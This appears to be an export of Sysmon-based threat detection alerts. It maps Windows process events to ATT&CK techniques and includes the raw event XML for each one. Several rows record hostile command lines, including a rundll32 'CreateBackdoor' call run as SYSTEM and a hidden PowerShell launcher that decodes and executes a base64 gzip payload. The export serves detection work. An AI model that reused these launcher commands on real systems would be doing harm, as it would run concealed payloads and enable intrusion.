<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 url.dll,FileProtocolHandler ms-browser://</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-2842-5E1E-0000-0020FF3A7A00</Data>
<Data Name=""LogonId"">0x7a3aff</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-2842-5E1E-0000-0010903C7A00</Data>
<Data Name=""ParentProcessId"">1628</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:44:50.353148Z"">
</TimeCreated>
<EventRecordID>336</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:44:50.348</Data>
<Data Name=""ProcessGuid"">747F3D96-2842-5E1E-0000-00100C417A00</Data>
<Data Name=""ProcessId"">4180</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 url.dll,FileProtocolHandler ms-browser://</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-2842-5E1E-0000-0020FF3A7A00</Data>
<Data Name=""LogonId"">0x7a3aff</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-2842-5E1E-0000-0010903C7A00</Data>
<Data Name=""ParentProcessId"">1628</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436040.330766,2019-07-30T01:34:00.330766+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh trace stop ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:58.683059Z"">
</TimeCreated>
<EventRecordID>4950</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:58.370</Data>
<Data Name=""ProcessGuid"">747F3D96-6646-5D3F-0000-0010913A8B00</Data>
<Data Name=""ProcessId"">6232</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c netsh trace stop</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.46327,2020-03-21T09:00:25.463270+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.459240Z"">
</TimeCreated>
<EventRecordID>243558</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.452</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-001035972000</Data>
<Data Name=""ProcessId"">1388</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:44:50.353148Z"">
</TimeCreated>
<EventRecordID>336</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:44:50.348</Data>
<Data Name=""ProcessGuid"">747F3D96-2842-5E1E-0000-00100C417A00</Data>
<Data Name=""ProcessId"">4180</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 url.dll,FileProtocolHandler ms-browser://</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-2842-5E1E-0000-0020FF3A7A00</Data>
<Data Name=""LogonId"">0x7a3aff</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-2842-5E1E-0000-0010903C7A00</Data>
<Data Name=""ParentProcessId"">1628</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:44:50.353148Z"">
</TimeCreated>
<EventRecordID>336</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:44:50.348</Data>
<Data Name=""ProcessGuid"">747F3D96-2842-5E1E-0000-00100C417A00</Data>
<Data Name=""ProcessId"">4180</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 url.dll,FileProtocolHandler ms-browser://</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-2842-5E1E-0000-0020FF3A7A00</Data>
<Data Name=""LogonId"">0x7a3aff</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-2842-5E1E-0000-0010903C7A00</Data>
<Data Name=""ParentProcessId"">1628</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.46327,2020-03-21T09:00:25.463270+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.459240Z"">
</TimeCreated>
<EventRecordID>243558</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.452</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-001035972000</Data>
<Data Name=""ProcessId"">1388</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1556656012.371714,2019-05-01T00:26:52.371714+04:00,,Threat,Critical,"Found User (NT AUTHORITY\SYSTEM) run Suspicious PowerShell commands that include ( -c ,[Convert]::FromBase64String,hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden , -c ,[Convert]::FromBase64String,hidden,Hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden ,WindowStyle) in event with Command Line (&quot;powershell.exe&quot; -noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))) and Parent Image :C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , Parent CommandLine (powershell.exe -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot;) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:26:52.356089Z"">
</TimeCreated>
<EventRecordID>9809</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:26:52.356</Data>
<Data Name=""ProcessGuid"">365ABB72-AF8C-5CC8-0000-001003361900</Data>
<Data Name=""ProcessId"">2484</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;powershell.exe&quot; -noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1